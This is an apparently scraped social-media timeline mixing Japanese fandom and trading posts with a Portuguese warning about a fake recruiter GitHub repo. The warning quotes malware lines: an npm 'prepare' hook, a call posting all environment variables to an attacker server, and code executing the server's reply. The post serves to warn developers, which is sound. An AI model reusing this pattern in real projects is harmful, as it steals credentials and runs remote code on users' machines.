はくあ@プロフ有
53.2K posts

はくあ@プロフ有
@109hakua
成人済みの取引垢兼表垢┊︎画像は生成AI避けにmixi2経由でアップする場合があります┊︎取引についてはこちらのLitlink参照https://t.co/msRG5wOq9e ┊︎自我あり本垢→@hakua109 ┊︎最近は専らmixi2 ┊︎Do Not Use for GAI training

燭台切公開で募金に参加。自分が参加したゲームでは焼失ではなく消失で処理してたんだけどこうなると、設定に会話諸々と近々ではないイベントも修正だな……でもこういうのがあるから楽しいよね。長く音信途絶えていたものに出くわしたと思うと感無量。

⚠️ Devs, parem tudo e leiam. Quase rodei malware na minha máquina agora mesmo e quero que vocês saibam exatamente como funciona o golpe. Recebi um link de um repo no GitHub: um "MVP" de um projeto web3/poker, com pedido pra clonar e rodar localmente. Visual de teste técnico, daqueles que recruiter manda. Antes de tocar em qualquer coisa, parei e li o código pelo próprio GitHub, sem clonar. Bem que desconfiei. Era malware. E não um qualquer — tinha DOIS payloads que executam SOZINHOS, sem você rodar nada explicitamente. 🎯 Payload 1 — dispara no `npm install` O `package.json` tinha `"prepare": "node server/server.js"`. O detalhe maldoso: o script `prepare` roda AUTOMÁTICO toda vez que você dá `npm install`. Dentro dele, escondido nas rotas do servidor, um: `axios.post(url, { ...process.env })` Ou seja: ele empacota TODAS as suas variáveis de ambiente — chaves de AWS, tokens de API, secrets, seed phrase de carteira cripto — e manda pro servidor do atacante. E não para aí: a RESPOSTA do servidor é passada pra `new Function("require", resposta)(require)`. Isso é execução de código arbitrário, com acesso total ao Node: filesystem, child_process, rede. Ele pode roubar suas chaves SSH, instalar persistência, o que quiser. A URL do atacante? Escondida em base64 no `.env`, decodificando pra um domínio na Vercel. Disfarce em cima de disfarce.


ぬーすと飾り方選手権、ミニチュアの刀(羊羹切や菓子切や食玩)を透明ケースに入れてその上に座らせると顕現したみたいで格好いいってことを言いたい んだけど刀剣男士限定で趣旨から外れるのでTLに放流

ちょっと気になるんですが…譲渡の場合でも送付先の交換は必須ですよね???譲渡のお取引して相手から送付先送られて来なくて今日届いたけど教えて貰ってなかったから誰から届いたか分からなかった←

何がAI駆動開発だ、何が「AIを中心とした開発ライフサイクル」だ。 ソフトウェア開発ではまずソフトウェア品質特性が中心にあり、ソフトウェア品質特性に立脚した上で品質を作り込むためにAIを利用するのが筋。 今のAI絡みの流れは主従関係が逆転している。











